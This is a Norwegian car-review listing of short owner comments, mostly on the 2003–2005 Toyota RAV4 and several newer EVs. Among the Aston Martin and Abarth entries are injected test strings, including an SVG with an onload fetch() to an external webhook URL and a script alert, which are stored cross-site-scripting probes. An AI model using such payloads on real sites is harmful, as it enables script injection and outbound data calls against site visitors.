Vurdert av Jonny
Toyota RAV4 (2005)
En skikkelig kvalitets-bil, men en MÅ ta tecyl-behandling da rust er en typisk gjenganger på eldre Toyota, også denne.
Toyota RAV4 (2005)
Siste gang jeg kjøper en Ræv4. På under 6mnd har motor-lampa mi lyst 3ganger. Og hver gang koster det meg ca 10.000 kr. Greit at det er litt utgifter og ha bil, med det blir latterlig.
Toyota RAV4 (2005)
Meget stabil og pålitelig bil. Tar seg godt fram. God vinterbil med riktige dekk. Dette er ikke en bil med mye finesser, men om man skal ha en driftssikker bil, kan jeg anbefale denne!
Toyota RAV4 (2005)
Topp bil med gode kjøreegenskaper og god komfort.
Toyota RAV4 (2005)
Totalt sett er jeg fornøyd med bilen, og den bruker lite drivstoff.
Toyota RAV4 (2004)
Fantastisk problemfri og fin turkamerat.
Toyota RAV4 (2004)
Dette er uten tvil den beste bilen jeg har eid noensinne, og jeg har eid en god del biler. Har flere ganger vurdert å bytte den i en nyere, men finner bare ikke noen god grunn. Deilig å ha en pålit
Toyota RAV4 (2004)
Klarer ikke å få meg til å selge denne enda da den er så praktisk, billig og sprek. Er redd for at jeg ikke kommer til å få en så økonomisk og driftsikker bil igjen. Bilen holder seg også god
Toyota RAV4 (2004)
Jeg har aldri før hatt en bil jeg har vært SÅ fornøyd med. Den svikter aldri, trenger minimalt med verksted. Kun normale slitedeler, bremseklosser etc. Liten bil med veldig god plass inni. Jeg er
Toyota RAV4 (2004)
En god bil som holder lenge. God kvalitet. Må på beregnes noe kostnader når man overstiger 160.000km. Reg reim bytte på hver 100.000 eller 5. år koster over 20.000kr. Clutchen (svinghjulet) er kj
Toyota RAV4 (2004)
Byttet clutch og svinghjul på 125000 km og dette er en svakhet på modellen som Toyota ikke tar ansvar for og de forlanger en skyhøy pris for rep. Fikk jobben gjort for halve prisen på et annet go
Toyota RAV4 (2003)
Vær obs på rust under bilen bak midten. Ellers et godt valg.
Toyota RAV4 (2003)
Fryktelig dårlig bil
Toyota RAV4 (2003)
helt grei om du ikke har store meninger om bil
Toyota RAV4 (2003)
flott bil med sportspakke,tar alle servicer ,ingen feil på de to siste PK visningene.man kan kjøre mange mil uten å bli sliten.
Renault 5 E-Tech (2025)
Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km